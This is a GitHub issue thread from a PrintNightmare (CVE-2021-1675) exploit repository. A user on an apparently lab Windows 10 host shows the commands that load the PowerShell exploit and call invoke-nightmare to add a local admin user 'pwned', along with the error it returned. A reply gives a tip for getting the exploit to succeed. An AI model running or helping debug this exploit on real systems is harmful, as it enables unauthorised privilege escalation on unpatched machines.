CVE-2021-1675 icon indicating copy to clipboard operation
CVE-2021-1675 copied to clipboard

Published 20 hours ago verified publisher icon cube0x0

[!] EnumPrinterDrivers should fail!

Open ZackInMA opened this issue 2 years ago • 1 comments

Run from an out of date Win10 host, Windows defender disabled, firewall disabled, file and printer sharing enabled, no mitigation steps taken. Print spooler is running, and allowing inbound client connections.

PS C:\Users\student\Desktop> systeminfo

Host Name: CLIENT251 OS Name: Microsoft Windows 10 Pro OS Version: 10.0.16299 N/A Build 16299

PS C:\Users\student\Desktop> import-module .\CVE-2021-1675.ps1 PS C:\Users\student\Desktop> invoke-nightmare -NewUser pwned -NewPassword "pwned!" -DriverName "PrintMe" [+] created payload at C:\Users\student\AppData\Local\Temp\nightmare.dll [!] EnumPrinterDrivers should fail!

ZackInMA avatar Jan 06 '23 21:01 ZackInMA

it will solve for you if you use the domain user account not the admin

CustosClarus avatar Oct 11 '23 04:10 CustosClarus